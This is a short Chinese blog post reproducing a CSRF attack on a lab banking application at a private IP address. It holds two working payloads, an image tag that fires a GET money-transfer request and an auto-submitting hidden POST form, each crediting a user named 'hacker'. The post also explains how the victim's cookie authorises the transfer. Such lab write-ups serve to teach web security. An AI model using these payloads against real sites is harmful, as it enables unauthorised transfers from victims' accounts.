CSRF漏洞场景复现

黑客登录后台,发现余额为0

admin用户

 黑客诱使黑客点击危险网站

<meta charset='utf-8'>
<img src='./1.jpg'><br />
<img src='http://10.9.75.168/csrf/bank/action.php?
username=hacker&money=100&submit=%E4%BA%A4%E6%98%93'
alt='宝刀在手,谁与争锋'>

如果我们把这个html页面发给受害者,受害者点击了我们的图片,就会发送这个GET请求,从而直接调用交易接口,并且携带受害者的cookie访问,从而实现转账功能。

黑客金钱+100

 检查发现点击链接就向黑客转账100

 还可以构造POST请求

<meta charset='utf-8'>
<form name='csrf' action='http://10.9.75.168/csrf/bank/action.php' method='post'>
<input type='hidden' name='username' value='hacker'>
<input type='hidden' name='money' value='100'>
</form>
<script>document.csrf.submit()</script>
<img src="./1.jpg" ><br />
<!--<a href='javascript:document.csrf.submit()' style='color:red;font-size:100px'>宝刀在手,谁与争锋</a><br />

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值